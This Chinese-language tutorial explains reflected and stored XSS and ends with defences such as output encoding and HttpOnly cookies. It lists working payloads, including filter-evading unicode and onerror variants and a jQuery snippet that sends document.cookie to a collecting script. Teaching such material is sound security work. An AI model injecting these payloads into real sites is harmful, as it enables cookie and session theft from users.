XSS(跨站脚本攻击)原理
- Xss(
cross-site scripting)攻击指的是攻击者向web页面插入恶意html标签或者javascript。当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的,比如获取用户的Cookie,导航恶意网站,携带木马等
XSS攻击分类
反射型XSS
存储型XSS
DOMXSS
XSS根源就是没完全过滤客户端提交的数据
反射型XSS
反射性XSS,又称为非持久性XSS。这种攻击方式的注入代码是从目服务器通过错误信息、搜索结果等等方式“反射”回来的。攻击方式具有一次性。攻击者通过电子电子邮件,图片,链接等方式将包含注入脚本的恶意链接发送给给受害者,当受害着点击链接时,注入脚本被输到目标服务器上,然后服务器将注入的脚本“反射”到受害者的浏览器上,从而在该浏览器上执行这段脚本
http://www.targetserver.com/search.php?input=<script>alert(document.cookie);</script>
- 当受害者点击这个连接的时候,注入的脚本被当作搜索的关键字发送到目标服务器
search.php页面中, - 则在搜索结果的返回返回页面中,这段脚本就被当作搜索的关键字嵌入
- 当用户得到搜索结果页面后,这段脚本也得到了执行。
- 这就是反射性XSS攻击的原理
存储型XSS
- 存储型XSS,又称为持久性CSS
- 和反射性XSS最大的不同的就是,攻击脚本将永久地存放在目标服务器的数据库中。
- 这种攻击多见于论坛,攻击者在发帖的过程中,将恶意脚本连同正常信息一起注入到帖子的内容中之中,随着帖子被论坛服务器存储下来,恶意脚本永久地存放在论坛服务器的后端数据库中。
- 当其他用户浏览这个被注入了恶意脚本的帖子的时候,恶意脚本则会在用户的浏览器中的到执行,从而受到了攻击
XSS的小技巧
- 通过简单的script脚本制造XSS攻击 容易被过滤
$username = "<script>
$.ajax({
url: 'xss.php',
dataType: 'jsonp',
data: {
'site': document.location.href,
'cookie': document.cookie}
});
</script>";
- 通过append制造的XSS攻击 可以结合JQ的append和innerHTML append函数遇到
script标签会执行eval函数,并且innerHTML会将unicode码转换为字符实体
$username_info = "\u003cscript\u003ealert(document.cookie);";
- 通过
img标签的src属性制造XSS攻击 容易被过滤
$imgsrc="\" onerror=\"javascript:alert(document.cookie);\"";
- 通过
img标签unicode同时配合onerror时间制造XSS攻击 不容易被过滤,一般需要用JSON转义
$username2="\u003cimg src=\'\' onerror=javascript:alert(\'okok\');\u003e";
- 通过
url制造XSS攻击
http://www.targetserver.com/search.php?input=<script>alert(document.cookie);</script>
- 通过
input输入框制造XSS工具
<input type="text" name="address1" value="" onfocus="alert(document.cookie)">
- 通过
eval函数知道XSS攻击
eval("alert(1)");
- 通过document.write('<script>alert(1)</script>')
document.write("<script>alert(1)</script>")
XSS出现的场景
1.1 比如:攻击者在论坛中放一个看似安全的连接,骗取用户点击后,窃取cookie中的用户私密信息;
1.2攻击者在论坛中加一个恶意表单,当用户提交表单的时候哦,却把信息传送到攻击者的服务器中,数据保存到数据中。而不是用户原本以为的信任站点
XSS防范方法
首先代码里对用户输入的地方和变量都需要仔细检查长度和对
“<” “>” “;” “,”字符做过滤
任何内容写到页面之前都必须加以encode,避免不小心把html tag弄出来。这一层面做好,至少可以堵住超过一半的XSS攻击避免直接在
cookie中泄漏用户隐私,例如email、密码如果网站不需要再对浏览器对
cookie进行操作,可以服务端设置httpOnly来防止javaScript代码直接获取cookie尽量采用
POST代替GET提交表单
